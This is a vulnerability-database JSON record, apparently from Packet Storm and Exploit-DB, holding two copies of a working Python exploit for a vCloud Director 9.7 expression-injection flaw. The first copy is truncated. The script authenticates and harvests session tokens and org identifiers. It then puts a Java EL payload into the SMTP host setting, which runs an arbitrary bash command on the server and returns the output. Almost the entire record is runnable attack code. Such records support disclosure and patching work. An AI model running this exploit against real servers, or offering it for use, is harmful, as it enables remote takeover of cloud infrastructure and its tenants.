xmlns:root=\"http://www.vmware.com/vcloud/v1.5\"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>' \ndata += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>' \ndata += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>' \ndata += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload) \ndata += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>' \nres = session.put(email_settings_url, data=data, headers=headers) \nmatch = re.search(r'value:\\s*\\[([^\\]]+)\\]', res.content) \n \nif verbose: \nprint('') \ntry: \nprint(base64.b64decode(match.group(1))) \nexcept Exception: \nprint(res.content) \n \n \nparser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') \nparser.add_argument('-v', action='store_true') \nparser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) \nparser.add_argument('-u', metavar='username', required=True) \nparser.add_argument('-p', metavar='password', required=True) \nparser.add_argument('-c', metavar='command', help='command to execute', default='id') \nargs = parser.parse_args() \n \nurl = urlparse(args.t) \nexploit(url, args.u, args.p, args.c, args.v) \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157945/vmwarevclouddir970-exec.txt"}], "exploitdb": [{"lastseen": "2020-06-03T10:22:28", "bulletinFamily": "exploit", "description": "", "modified": "2020-06-02T00:00:00", "published": "2020-06-02T00:00:00", "id": "EDB-ID:48540", "href": "https://www.exploit-db.com/exploits/48540", "type": "exploitdb", "title": "vCloud Director 9.7.0.15498291 - Remote Code Execution", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: vCloud Director - Remote Code Execution\r\n# Exploit Author: Tomas Melicher\r\n# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/\r\n# Date: 2020-05-24\r\n# Vendor Homepage: https://www.vmware.com/\r\n# Software Link: https://www.vmware.com/products/cloud-director.html\r\n# Tested On: vCloud Director 9.7.0.15498291\r\n# Vulnerability Description: \r\n# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.\r\n\r\nimport argparse # pip install argparse\r\nimport base64, os, re, requests, sys\r\nif sys.version_info >= (3, 0):\r\n from urllib.parse import urlparse\r\nelse:\r\n from urlparse import urlparse\r\n\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\nPAYLOAD_TEMPLATE = \"${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}\"\r\nsession = requests.Session()\r\n\r\ndef login(url, username, password, verbose):\r\n\ttarget_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)\r\n\tres = session.get(target_url)\r\n\tmatch = re.search(r'tenant:([^\"]+)', res.content, re.IGNORECASE)\r\n\tif match:\r\n\t\ttenant = match.group(1)\r\n\telse:\r\n\t\tprint('[!] can\\'t find tenant identifier')\r\n\t\treturn (None,None,None,None)\r\n\r\n\tif verbose:\r\n\t\tprint('[*] tenant: %s'%(tenant))\r\n\r\n\tmatch = re.search(r'security_check\\?[^\"]+', res.content, re.IGNORECASE)\r\n\tif match:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Cloud Director 9.*\r\n\t\tlogin_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))\r\n\t\tres = session.post(login_url, data={'username':username,'password':password})\r\n\t\tif res.status_code == 401:\r\n\t\t\tprint('[!] invalid credentials')\r\n\t\t\treturn (None,None,None,None)\r\n\telse:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Cloud Director 10.*\r\n\t\tmatch = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)\r\n\t\tif match:\r\n\t\t\tlogin_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))\r\n\t\t\theaders = {\r\n\t\t\t\t'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),\r\n\t\t\t\t'Accept': 'application/json;version=29.0',\r\n\t\t\t\t'Content-type': 'application/json;version=29.0'\r\n\t\t\t}\r\n\t\t\tres = session.post(login_url, headers=headers)\r\n\t\t\tif res.status_code == 401:\r\n\t\t\t\tprint('[!] invalid credentials')\r\n\t\t\t\treturn (None,None,None,None)\r\n\t\telse:\r\n\t\t\tprint('[!] url for login form was not found')\r\n\t\t\treturn (None,None,None,None)\r\n\r\n\tcookies = session.cookies.get_dict()\r\n\tjwt = cookies['vcloud_jwt']\r\n\tsession_id = cookies['vcloud_session_id']\r\n\r\n\tif verbose:\r\n\t\tprint('[*] jwt token: %s'%(jwt))\r\n\t\tprint('[*] session_id: %s'%(session_id))\r\n\r\n\tres = session.get(target_url)\r\n\tmatch = re.search(r'organization : \\'([^\\']+)', res.content, re.IGNORECASE)\r\n\tif match is None:\r\n\t\tprint('[!] organization not found')\r\n\t\treturn (None,None,None,None)\r\n\torganization = match.group(1)\r\n\tif verbose:\r\n\t\tprint('[*] organization name: %s'%(organization))\r\n\r\n\tmatch = re.search(r'orgId : \\'([^\\']+)', res.content)\r\n\tif match is None:\r\n\t\tprint('[!] orgId not found')\r\n\t\treturn (None,None,None,None)\r\n\torg_id = match.group(1)\r\n\tif verbose:\r\n\t\tprint('[*] organization identifier: %s'%(org_id))\r\n\r\n\treturn (jwt,session_id,organization,org_id)\r\n\r\n\r\ndef exploit(url, username, password, command, verbose):\r\n\t(jwt,session_id,organization,org_id) = login(url, username, password, verbose)\r\n\tif jwt is None:\r\n\t\treturn\r\n\r\n\theaders = {\r\n\t\t'Accept': 'application/*+xml;version=29.0',\r\n\t\t'Authorization': 'Bearer %s'%jwt,\r\n\t\t'x-vcloud-authorization': session_id\r\n\t}\r\n\tadmin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)\r\n\tres = session.get(admin_url, headers=headers)\r\n\tmatch = re.search(r'<description>\\s*([^<\\s]+)', res.content, re.IGNORECASE)\r\n\tif match:\r\n\t\tversion = match.group(1)\r\n\t\tif verbose:\r\n\t\t\tprint('[*] detected version of Cloud Director: %s'%(version))\r\n\telse:\r\n\t\tversion = None\r\n\t\tprint('[!] can\\'t find version of Cloud Director, assuming it is more than 10.0')\r\n\r\n\temail_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)\r\n\r\n\tpayload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))\r\n\tdata = '<root:OrgEmailSettings xmlns:root=\"http://www.vmware.com/vcloud/v1.5\"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'\r\n\tdata += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'\r\n\tdata += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'\r\n\tdata += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)\r\n\tdata += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'\r\n\tres = session.put(email_settings_url, data=data, headers=headers)\r\n\tmatch = re.search(r'value:\\s*\\[([^\\]]+)\\]', res.content)\r\n\r\n\tif verbose:\r\n\t\tprint('')\r\n\ttry:\r\n\t\tprint(base64.b64decode(match.group(1)))\r\n\texcept Exception:\r\n\t\tprint(res.content)\r\n\r\n\r\nparser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')\r\nparser.add_argument('-v', action='store_true')\r\nparser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)\r\nparser.add_argument('-u', metavar='username', required=True)\r\nparser.add_argument('-p', metavar='password', required=True)\r\nparser.add_argument('-c', metavar='command', help='command to execute', default='id')\r\nargs = parser.parse_args()\r\n\r\nurl = urlparse(args.t)\r\nexploit(url, args.u, args.p, args.c, args.v)", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48540"}]}
